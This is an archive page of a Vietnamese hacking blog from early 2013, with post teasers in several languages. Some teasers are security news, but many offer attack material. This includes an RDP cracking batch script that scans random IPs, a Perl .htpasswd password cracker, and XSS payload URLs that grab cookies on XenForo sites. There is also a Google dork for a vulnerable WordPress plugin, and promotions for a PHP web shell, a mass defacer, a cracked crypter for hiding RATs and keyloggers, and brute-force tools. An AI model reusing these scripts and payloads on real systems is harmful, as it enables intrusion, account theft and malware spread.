Tuesday, January 29, 2013


Nếu hack thành công vào hệ điều hành Chrome OS của Google, hacker không những không gặp phải rắc rối về pháp lý mà thậm chí còn có cơ hội nhận được giải thưởng lên đến hơn 3 triệu USD do chính Google trao tặng.

ĐỌC TIẾP »

Google treo giải 3,1 triệu USD cho hacker

By: MIN Software on: 8:42 AM
Phân tích kỹ thuật tấn công Pass the Hash
Cách thức hoạt động của kỹ thuật tấn công Pass the Hash và minh họa các quá trình sử dụng thành công giá trị hash của mật khẩu lấy được mà không cần phải crack để có các nội dung đã được che giấu của nó.

ĐỌC TIẾP »

Kỹ thuật tấn công Pass the Hash và cách phòng chống

By: MIN Software on: 6:11 AM

Friday, January 25, 2013

[img]


Hoy 23 de Enero, Oracle nuevamente es blanco de los "Hackers", pues se ha publicado una nueva vulnerabilidad que afectan a las versiones de Java 7u7-10 y anteriores, permitiendo a un atacante ejecutar código remoto en el sistema de la victima (Windows - Linux - MAC), para ello el equipo de Metasploit ha desarrollado un modulo denominado java_jre17_glassfish_averagerangestatisticimpl que facilita el trabajo a un atacante en el proceso de explotacion de esta nueva vulnerabilidad.
ĐỌC TIẾP »

Exploiting Java Applet AverageRangeStatisticImpl Remote Code Execution

By: MIN Software on: 12:27 PM

Wednesday, January 23, 2013

Bài viết sau đây sẽ hướng dẫn cách connect vào wifi mà không cần password đơn giản mà hiệu quả. Các bạn sẽ không phải đau đầu đi tìm các phần mềm hack/crack pass wifi nữa mà thông qua pass của máy tính đã connect wifi trước đó.
ĐỌC TIẾP »

Kết nối Wifi không cần biết mật khẩu

By: MIN Software on: 9:24 AM

Tuesday, January 22, 2013

Ngày nay, kiếm được một phần mềm anti virus hoạt động hiệu quả và không tốn quá nhiều tài nguyên máy không còn quá khó như một vài năm trước.

Điểm danh những phần mềm miễn phí, ta có AVG, Avast, Avira, thậm chí việc kiếm key bản quyền xịn của những Kaspersky, Bitdefender cũng không còn quá khó và đắt đỏ.

Nhưng khi nói đến bảo mật, có rất nhiều khía cạnh ta cần lưu tâm, trong đó tìm kiếm và cài đặt một phần mềm antivirus tốt mới chỉ là một mặt của vấn đề.
ĐỌC TIẾP »

Lỗ hổng bảo mật - những hiểu biết căn bản

By: MIN Software on: 8:18 AM

Monday, January 21, 2013

How to check Thuexesaigon.net?

By: MIN Software on: 9:35 AM

Sunday, January 20, 2013

Bypass CloudFlare Video

By: MIN Software on: 4:20 AM
Stealing Session's Via HTML Injection

Download Video: http://www.mediafire.com/?c45nf3t4f84b0zf

Password: junookyo

Stealing Session's Via HTML Injection

By: MIN Software on: 3:53 AM
[Image]

/*Cross Site Scripting filtration Bypass */

This Tutorial Was Not Originally written by Me

_1
__________________________________________
Introduction To Xss(Cross site scripting):

'Cross-Site Scripting' also known as 'XSS' in short is a kind of vulnerability that exist in era of both web applications
as well as os based applications, but in most cases in web applications.You might be wondering why it's known as 'xss' not
'css' reffering to the full form.Well, basically css is already a reserved abbreviation of 'Cascade Style Sheets'.It allows
malicious code to be executed on a vulnerable server most probably session hijacking to gain administrator privileges.
Xss totally depends on cookies and session and though 'cookies' are known as the backbone of Cross-Site Scripting
Vulnerability.

ĐỌC TIẾP »

Cross Site Scripting filtration Bypass

By: MIN Software on: 12:20 AM
[Image]

Simple XSS Vulnerability Patch

Download video: http://www.mediafire.com/?6s49anyo3l3pofo

Password Unlock: junookyo

Simple XSS Vulnerability Patch

By: MIN Software on: 12:13 AM

Saturday, January 19, 2013

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhS3ZkdEH6aUqvY63Wq_XHexU6MpV19hRDW3GrMqW7bhccyHevZmw8C6DpTpNhOEv7Od08xHmaPu21KCPFLSKVkaL-8xm75RF1dcCDuZqZksVHCU9mNWbrFZS-dR0ShmNKA7JFMNbOWgxUQ/s1600/domXss2.png

Tutorial about Dom base XSS.

Download here: http://www.mediafire.com/?w0i9gt4m5cu7gbo

Password: junookyo

Danger Based XSS (Cross Site Scripting)

By: MIN Software on: 11:27 PM
/==========================================================​\
---------------------------------[ PLAYHACK.net ]---------------------------------
\=========================================================​=/

-[ INFOS ]-----------------------------------------------------------------------
Title: "Cross-Site Scripting for Fun and Profit"
Author: Nexus
Website: http://nexus.playhack.net
Date: 2007-04-08 (ISO 8601)
---------------------------------------------------------------------------------

ĐỌC TIẾP »

Cross-Site Scripting for Fun and Profit

By: MIN Software on: 11:02 PM
I found these script on google so all credits goes to coder

Save this Script as name "blah.bat"


Code:
@echo off
for /l %%%x in (1,1,2) do (
start "rdp" /HIGH nmap -n -Pn -p T:3389 -T5 --script rdp.nse -iR 0
)
exit
ĐỌC TIẾP »

RDP Cracking IP List Maker Script

By: MIN Software on: 12:06 PM
#! /usr/bin/perl
# crack.pl by fwaggle root@fwaggle.net
open (PASSFILE, "senhas");
my @passfile = <PASSFILE>;
close PASSFILE;
open (DICTFILE, "dictionary.txt");
my @dictfile = <DICTFILE>;
close DICTFILE;
foreach $line (@passfile) {
my ($username, $encpass) = split(/:/, $line);
foreach $attempt (@dictfile) {
if ($encpass eq crypt($attempt, $encpass)) {
print("Cracked: ${username}:${attempt}\n");
}
}
}

.htpasswd crack exploit

By: MIN Software on: 11:31 AM
This is offical 2nd php shell by Madleets Team

this shell design specially for command line user . you can use Shell as terminal ..you type any command it will show result same as terminal ..
ĐỌC TIẾP »

MadSpot Shell v2 (Released)

By: MIN Software on: 11:25 AM
===========================
Writing an XSS worm
Version 0.3 (Updated 17/10/06)
By kuza55
===========================
ĐỌC TIẾP »

Writing an XSS Worm

By: MIN Software on: 10:43 AM
Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability

Google Dork: inurl:"/wp-content/plugins/spotlightyour/"

Date: 18/11/2012

Locations: Banjarmasin, Indonesia

Author: ovanIsmycode & walangkaji

Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org

Software Link: http://www.spotlightyour.comĐỌC TIẾP »

Wordpress Plugins Spotlight Upload Vulnerability

By: MIN Software on: 10:33 AM
Title: XSS vul in Xenforo CMS.

Author: Darksnipper

CMS Link: www.xenforo.com
vul type: XSS.

VUL concept:
http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/js/swfupload/Flash/swfupload.swf?movieName=< s c ri pt> alert("halo") < / script >

Greetz: Dream.killer,ErrorHaxor,Soul~inj3ctor,x30-1337,Dr.v!ru$,Dr.z0mbie,soldier OfGod,shadow008,P4k c4mmand3r,Dark knight,Pak Cyber Army,3xp1r3 CyberArmy,Kashmir Cyber Army

Or read here:
http://www.exploit4arab.com/exploits/321

XSS vul in Xenforo CMS

By: MIN Software on: 10:30 AM

Prv8 wordpress and joomla mass defacer

By: MIN Software on: 10:15 AM
Nemesis Crypter Fully Cracked | Juno_okyo's Blog
Nemesis Crypter is a good tool to FUD your RAT or Keylogger. It was used to make FUD but now it is only UD (Undetectable) but anyways its a nice tool with many impressive options for your use. Just click on cancel when it asks you for serial key :) . Sometimes some antivirus detects it as virus but dont worry it is a valse positive. There is about 2/6 chances of antivirus to detect it. Its false positive.ĐỌC TIẾP »

Nemesis Crypter Fully Cracked

By: MIN Software on: 10:06 AM

Finding an xss’s vulnerable website is not very difficult.
In most cases can write in the search:

Code:
“><script>alert(‘try_xss’);</script>

This script does nothing more than send an alert on the screen, if you see the alert means that the script is taken into the site.

ĐỌC TIẾP »

Hunting for XSS Vulnerabilities

By: MIN Software on: 9:58 AM
All Web Application Attacking Methods | Juno_okyo's Blog
This list is not full list, if there are some attacks I missed, please comment below.
ĐỌC TIẾP »

All Web Application Attacking Methods

By: MIN Software on: 9:54 AM
Joomla Administrator Login BruteForcer [Python] | Juno_okyo's BLog


It is a successful bruteforcer of Joomla Administration Panel, coded in Python.

ĐỌC TIẾP »

Joomla Administrator Login BruteForcer [Python]

By: MIN Software on: 9:48 AM
 
 1. Introduction

 2. /proc/self/environ
 3. PHP injection
 4. Accessing the shell
ĐỌC TIẾP »

Hacking Websites via LFI (Simple, Short and easy)

By: MIN Software on: 9:42 AM
http://www.inspiredelearning.com/blog/wp-content/uploads/2012/10/security-awareness-infographic-reduced.jpg

Infographic: Malware is Everywhere

By: MIN Software on: 9:37 AM
Exploiting New Java 0-day with Metasploit | Juno_okyo's Blog

Se ha descubierto una nueva vulnerabilidad (0-day) en las versiones de Java 7 Update 10 y anteriores, que permite a un atacante ejecutar código arbitrario en cualquier sistema operativo que cuente con esta version de Java. Actualmente esta versión es la ultima actualización  por lo tanto el 90% de los usuarios de Internet lo tienen instalado y el 50% de estos no tienen conocimiento sobre el riesgo que pueden estan corriendo.
ĐỌC TIẾP »

Exploiting New Java 0-day with Metasploit

By: MIN Software on: 9:31 AM
SQL Injection to Shell with SQLMap | Juno_okyo's Blog
Hace algunos días auditando un Servidor Web (universidad) basada en Apache 1.3.26, PHP 4.2.1 a un cliente, me tope con la típica vulnerabilidad de Inyección de Código Sql, la cual permite fácilmente obtener toda la base de datos del servidor, entonces de inmediato empece a inyectar manualmente pero para mi suerte!!! ninguna de las inyecciones y bypasses dio resultado, entonces me pregunte ¿Por que? si es una vulnerabilidad peligrosa y fácilmente explotable, pero luego analizando nuevamente di con el resultado que era un simple FP (falso positivo).
ĐỌC TIẾP »

SQL Injection to Shell with SQLMap

By: MIN Software on: 9:28 AM
Exploiting Windows 7 with Internet Explorer CSS Recursive Import Exploit | Juno_okyo's Blog



Existe una vulnerabilidad en las versiones 8 y anteriores de Internet Explorer que permite a un atacante vulnerar cualquier Sistema Operativo que contengan estas versiones vulnerables. Recordar que en la actualidad existen muchos exploits remotos que pueden vulnerar este navegador, pero esta vulnerabilidad no es muy "conocida" por los usuarios ya que hasta la actualidad se puede seguir explotando.  
El respectivo modulo que se integra en Metasploit se aprovecha de una vulnerabilidad de corrupción de memoria en Microsoft\'s HTML motor (mshtml). Este exploit utiliza una combinación de aspersión y el módulo de almacenamiento dinámico 'mscorie.dll' la 2.0. NET para bypassear DEP y ASLR aprovechándose así para tomar el control total del sistema vulnerable.
A continuacion se detallaran los procedimientos que un atacante realizara cuando desee vulnerar cualquier sistema operativo que contenga esta vulnerabilidad.
ĐỌC TIẾP »

Exploiting Windows 7 with Internet Explorer CSS Recursive Import Exploit

By: MIN Software on: 9:24 AM

Metasploit: Java Signed Applet

By: MIN Software on: 9:13 AM

Wednesday, January 16, 2013

  • Exploit: Cross Site Scripting (XSS)
  • Description: Inject script via some inputs.
  • Tình trạng: (Đang liên hệ QTV).

[Warning] TenTen.vn - Cross Site Scripting

By: MIN Software on: 11:13 PM

Monday, January 14, 2013

Phần mở rộng (extension) miễn phí của Google Chrome cho phép gửi đi email được mã hóa từ Gmail tới các dịch vụ email khác. Bạn cần gửi đi một email chứa thông tin nhạy cảm? Mọi email gửi đi theo cách thông thường đều có nguy cơ bị chặn hoặc bị “hack” trước khi đến tay người nhận.
ĐỌC TIẾP »

Cách gửi email mã hóa qua Gmail trên Chrome

By: MIN Software on: 9:46 PM
Ứng dụng xem file PDF, Foxit Reader, vừa bị phát hiện dính lỗ hổng nghiêm trọng trong thành phần plug-in, có thể bị khai thác để thực thi các mã tùy chỉnh trên máy tính.

Thông tin chi tiết về lỗ hổng và cách khai thác lỗ hổng đã được hacker độc lập người Ý, Andrea Micalizzi công bố công khai vào tuần trước.
ĐỌC TIẾP »

Foxit Reader dính lỗ hổng bảo mật nghiêm trọng

By: MIN Software on: 9:44 PM
Bộ An ninh nội địa Mỹ khuyên người dùng máy tính nên vô hiệu hoá Java trên trình duyệt web của mình bởi Oracle mới sửa một lỗi trên đó và vẫn còn nhiều lỗ hổng bảo mật khác chưa được vá.
ĐỌC TIẾP »

Java dù được sửa lỗi vẫn chưa an toàn

By: MIN Software on: 9:37 PM
Hãng phần mềm vừa tung ra Java Version 7 Update 11 nhằm ngăn kẻ xấu lợi dụng lỗ hổng bảo mật để điều khiển máy tính từ xa.

[Hình 1] Java

Java vừa có phiên bản mới.
ĐỌC TIẾP »

Oracle vá lỗi bảo mật nghiêm trọng cho Java

By: MIN Software on: 2:25 AM
Các chuyên gia bảo mật mới đây vừa lên tiếng cảnh báo người dùng nên tắt Java trên trình duyệt của họ để bảo vệ máy tính, bởi Java đang gặp lỗ hổng bảo mật rất lớn và hacker đang lợi dụng các lổ hổng này để tấn công người dùng. Đi tiên phong trong việc này là Apple và Mozilla. "Táo khuyết" đã vô hiệu hóa plugin Java 7 trên OS X; còn Mozilla đưa các add-on Java 7 Update 9, Java 7 Update 10, Java 6 Update 37, and Java 6 Update 38 vào "danh sách đen" không cho tải về. Bởi thế, người dùng cần vô hiệu hóa Java trên trình duyệt của mình để tránh các nguy cơ bị tấn công trong khi chờ đợi 1 phiên bản cập nhật Java có thể vá các lỗ hổng bảo mật.
ĐỌC TIẾP »

Cách vô hiệu hóa Java đang gây lỗi nguy hiểm cho máy tính

By: MIN Software on: 2:23 AM

Sunday, January 13, 2013

Gần đây, virus Eurograbber đã được các tin tặc sử dụng để lấy cắp 36 triệu euro từ nhiều tài khoản ngân hàng tại các nước châu Âu.

Trong thời gian qua, trên thế giới đã xuất hiện nhiều vụ lừa đảo trên mạng Internet do các đối tượng lợi dụng sự bất cẩn của người sử dụng để cài đặt virus độc hại trên máy tính cá nhân và thiết bị di động, từ đó lấy cắp thông tin và tiền từ tài khoản ngân hàng.
ĐỌC TIẾP »

Cảnh báo virus lấy cắp thông tin tài khoản ngân hàng

By: MIN Software on: 12:05 AM

Saturday, January 12, 2013

Thân chào các linux sysadmin, dưới đây là 40 mẹo/thủ thuật cơ bản mà không hẳn là dân quản trị nào cũng đã nắm qua.
Anh chị em nào có mẹo hay hay thì bổ sung cho có khí thế. Còn rất nhiều và không phải tất cả đều đúng trên mọi hệ thống nhé !

ĐỌC TIẾP »

40 basic linux command-line tips and tricks

By: MIN Software on: 7:19 AM
pfSense là 1 Open Source Filewall Distribution rất phổ dụng. thường dùng làm chốt chặn đầu ra internet rất hiệu quả trong doanh nghiệp cũng như các tổ chức (ưu điểm là Open Source và dễ dùng), thế nên các các lỗ hổng dưới đây nếu biết cách khai thác thì sẽ có khối việc để quan tâm đấy!
ĐỌC TIẾP »

pfSense 2.0.1 XSS / CSRF / Remote Command Execution Vulnerabilities

By: MIN Software on: 6:14 AM
Lương lập trình viên PHP lúc mới ra trường chỉ khoảng 3 đến 5 triệu đồng một tháng, nhưng đây là thời gian để bạn tập trung vào nâng cao kỹ năng lập trình, kỹ năng mềm, làm việc nhóm, trau dồi ngoại ngữ... Những vị trí cấp cao trong lĩnh vực này lương có thể tới 2.000 USD.
ĐỌC TIẾP »

Con đường trở thành lập trình viên PHP

By: MIN Software on: 6:04 AM
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
ĐỌC TIẾP »

Java Applet JMX Remote Code Execution

By: MIN Software on: 1:13 AM
Trong thời đại lên ngôi của các thiết bị di động thông minh như smartphone, tablet hay laptop, mạng wifi đã trở nên vô cùng thân thuộc đối với các hộ gia đình tại Việt Nam.

Hầu hết mọi người đều ý thức được tầm quan trọng của việc đặt mật khẩu cho mạng không dây để bảo vệ băng thông đường truyền cũng như ngăn chặn kẻ xấu đột nhập vào máy tính nhằm ăn cắp dữ liệu mật. Do đó gần như tất cả những ai sử dụng modem, router wifi đều đã thiết lập password trong lần đầu tiên lắp đặt và vận hành thiết bị.
ĐỌC TIẾP »

Cẩn thận với các mánh hack wifi lan truyền trên mạng

By: MIN Software on: 1:08 AM

Friday, January 11, 2013

[Warning] RapperVN.net - Cross Site Scripting | Juno_okyo's Blog
  • Exploit: Cross Site Scripting
  • Description: Inject via member's blog.

[Warning] RapperVN.net - Cross Site Scripting

By: MIN Software on: 7:07 AM
Skydreamer HTML5 responsive vCard | Juno_okyo's Blog
Skydreamer HTML5 responsive vCard | Juno_okyo's Blog
Skydreamer HTML5 responsive vCard | Juno_okyo's Blog


home : http://themeforest.net/item/skydream...-vcard/2950493
demo : http://simplesphere.net/html5/
Skydreamer HTML5 responsive vCard is a simple, minimalistic, clean and easy to set up CSS3 Vcard template. It can be adpated for both personal or commercial (business) use. A great way to showcase your portfolio, Skydreamer HTML5 vCard comes with a unique design, that adapts to different screen sizes with adequate comments all over the theme files and a solid documentation. The template has a unique and impressive look that will satisfy every taste.
Please rate my design so that I can further improve my upcoming themes
ĐỌC TIẾP »

Skydreamer HTML5 responsive vCard

By: MIN Software on: 12:42 AM

Thursday, January 10, 2013

Another Stored XSS in Facebook.com, Another 3500$ Bounty

Hi,

I want to share my Stored XSS finding in facebook.com,

ĐỌC TIẾP »

Another Stored XSS in Facebook.com

By: MIN Software on: 1:10 PM
Gmail  và Yahoo Mail hay bất cứ dịch vụ mail nào khác đều không hỗ trợ đính kèm các tệp tin có định dạng .exe (file chạy) và một số định dạng khác. Tuy nhiên, có rất nhiều cách để bạn gửi file chạy qua email, trong đó phổ biến nhất là nén file đó thành định dạng RAR, ZIP hay 7Z rồi mới tiến hành đính kèm. Một thủ thuật khá đơn giản có thể giúp bạn thực hiện điều này ngay trong Gmail bằng cách sử dụng dịch vụ lưu trữ trực tuyến Google Drive.
ĐỌC TIẾP »

Gửi tệp tin .exe ngay trong Gmail

By: MIN Software on: 1:26 AM
Race condition là một vấn đề không mới, mình cũng đã biết từ lâu nhưng toàn trên linux. Để hiểu race condition trên web ta xem 1 ví dụ như sau :
Người A có 10000 $ trong tài khoản, anh ta thực hiện rút 5 lần cùng lúc từ internet banking (bỏ qua 1 số token bảo vệ nhé), mỗi lần 10$, nhưng trong tài khoản chỉ trừ 10$ thôi (lẽ ra phải trừ 50). Vậy lỗi xảy ra ở đâu ?
ĐỌC TIẾP »

[Tutorial] Race condition attack trên ứng dụng web

By: MIN Software on: 1:22 AM

Wednesday, January 9, 2013

TTO - Khi nhấn vào liên kết được gửi trong email Yahoo! Mail, kể cả từ địa chỉ người quen, hacker sẽ có thể khai thác lỗi và gửi hàng loạt email tương tự đến tất cả địa chỉ trong danh bạ.
[Hình ảnh] Yahoo! chặn lỗi nguy hiểm trong mail | Juno_okyo's Blog
Ảnh minh họa: Internet
ĐỌC TIẾP »

Yahoo! chặn lỗi nguy hiểm trong mail

By: MIN Software on: 5:05 AM

Monday, January 7, 2013

[TUT] Brute force password Gmail with Hydra

By: MIN Software on: 8:34 AM

Sunday, January 6, 2013


HD 720p: http://www.youtube.com/watch?v=nps0zPB78fk (open in new tab).

Cracking wifi wpa-psk Networks (Learn How to Protect your Privacy)

By: MIN Software on: 6:53 PM
Hi,

I want to share my finding regarding Password Reset logic flaw in Facebook Secure Files Transfer for Employees.

Sometimes when you add a new security measure (Such as Secured File Transfer by Acellion),  You may unintentionally expose your organization to these kind of risks

ĐỌC TIẾP »

How I Hacked Facebook Employees Secure Files Transfer service (http://files.fb.com)

By: MIN Software on: 4:14 PM
Introductions:
Lỗi này xuất hiện trên các máy chủ web Microsoft IIS cho phép Attacker có thể đoán được tên các file hay folder mà bình thường họ không thể thấy được.
Khi bạn upload 1 file trên website, máy chủ web sẽ tạo ra 1 tên ngắn file cho nó.
Ví dụ khi bạn upload file "default.aspx" , máy chủ sẽ tạo ra 1 file có tên ngắn là "defaul~1.asp"

ĐỌC TIẾP »

[TUT] - Khai thác lỗi Microsoft IIS tilde character ~

By: MIN Software on: 1:00 AM

Saturday, January 5, 2013

Hello guys this is AV.. Today i'll show you the two ways to crack cpanel

What we will need for this?

1. shelled website

2. the shelled website should be symlink enableled.

Lets start XD
ĐỌC TIẾP »

How to crack cPanels

By: MIN Software on: 11:25 PM
Online SQLi scanner is the best thing you need when you are out of your private hacking room. So here is one more Online SQLi scanner i found today so sharing with you people. 

Its right here - http://www.poomplacedorm.com/hyde.php


Online SQLi Scanner | Juno_okyo's Blog

Online SQLi Scanner

By: MIN Software on: 11:06 PM

Online Hash Crackers (Collection)

By: MIN Software on: 11:04 PM

Metasploit Framework Guide for PenTesters

By: MIN Software on: 10:54 PM
Tổng hợp Slide về an toàn thông tin. Link download:
http://www.mediafire.com/?zpnfx6oxiw6rpmc

[Slide] Security BootCamp 2012

By: MIN Software on: 10:50 PM

Friday, January 4, 2013

Đã có 1 bài hướng dẫn tại đây:
http://junookyo.blogspot.com/2012/12/huong-dan-tu-tao-skin-cho-yahoo.html
Mình làm video hướng dẫn 1 cách chi tiết và rõ ràng cho những bạn nào chưa làm được:

Xem HD tại tab mới nhé:

[Video TUT] Hướng dẫn tự tạo skin Yahoo

By: MIN Software on: 4:12 AM

Tuesday, January 1, 2013



Description

GenXE: Generate XSS Exploit (tool). Give us a simple cross-site scripting exploit: alert, GenXE generates complex exploit(s) for you.

GenXE Web Site

Download source:
http://sourceforge.net/projects/genxe/files/latest/download

GenXE: Generate Xss Exploit

By: MIN Software on: 5:05 AM
Giao thức HTTP viết tắt của cụm từ Hyper Text Transfer Protocol (giao thức truyền siêu văn bản) và nó đã trở thành giao thức mặc định khi bạn sử dụng các trình duyệt để lướt web. Đôi khi bạn gặp các lỗi thông báo khi dùng giao thức HTTP, thường được gọi là HTTP error codes (tạm dịch: mã lỗi HTTP). Mời các bạn theo dõi bài viết để có các nhìn về các mã lỗi này và hướng dẫn cách giải quyết.
ĐỌC TIẾP »

Các lỗi HTTP khi truy cập web và cách sửa

By: MIN Software on: 12:15 AM

 

Our Team Members

Copyright © hacker va bao mat | Designed by Templateism.com | WPResearcher.com